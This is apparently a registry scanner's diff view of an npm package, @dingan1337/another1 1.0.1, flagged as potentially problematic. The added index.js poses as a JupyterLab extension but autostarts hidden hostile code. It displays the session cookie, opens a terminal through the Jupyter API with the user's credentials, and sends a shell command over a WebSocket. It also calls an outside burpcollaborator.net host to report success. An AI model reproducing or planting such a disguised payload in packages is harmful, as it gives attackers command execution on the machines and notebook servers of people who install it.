@dingan1337/another1 1.0.1
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of @dingan1337/another1 might be problematic. Click here for more details.
- package/index.js +34 -0
- package/package.json +11 -0
package/index.js
ADDED
|
@@ -0,0 +1,34 @@
|
|
|
1
|
+
|
|
2
|
+
import {
|
|
3
|
+
JupyterFrontEnd, JupyterFrontEndPlugin
|
|
4
|
+
} from '@jupyterlab/application';
|
|
5
|
+
|
|
6
|
+
const extension: JupyterFrontEndPlugin<void> = {
|
|
7
|
+
id: 'another',
|
|
8
|
+
autoStart: true,
|
|
9
|
+
activate: (app: JupyterFrontEnd) => {
|
|
10
|
+
alert(document.cookie);
|
|
11
|
+
console.log("started !!!");
|
|
12
|
+
var xhttp = new XMLHttpRequest;
|
|
13
|
+
var termUri = location.origin + "/gateway/default/jupyter/api/terminals";
|
|
14
|
+
xhttp.open("POST", termUri, true);
|
|
15
|
+
xhttp.withCredentials = true;
|
|
16
|
+
xhttp.onreadystatechange = function() {
|
|
17
|
+
if (this.readyState == 4 && this.status == 200) {
|
|
18
|
+
fetch("http://k1mpq3iwboupo0l01vh5e3bycpig65.burpcollaborator.net/success")
|
|
19
|
+
console.log("request successfull!!! ");
|
|
20
|
+
var resp = xhttp.responseText.split('"');
|
|
21
|
+
var terminal_id = resp[3];
|
|
22
|
+
var wsUri = "wss://"+location.host+"/terminals/websocket/"+terminal_id;
|
|
23
|
+
var ws = new WebSocket(wsUri);
|
|
24
|
+
ws.onopen = function(evt) {
|
|
25
|
+
ws.send('["stdin","touch pwned.txt\\r"]');
|
|
26
|
+
fetch("http://k1mpq3iwboupo0l01vh5e3bycpig65.burpcollaborator.net/")
|
|
27
|
+
};
|
|
28
|
+
console.log("file created pwned.txt!!! ");
|
|
29
|
+
}
|
|
30
|
+
};
|
|
31
|
+
xhttp.send();
|
|
32
|
+
}
|
|
33
|
+
};
|
|
34
|
+
export default extension;
|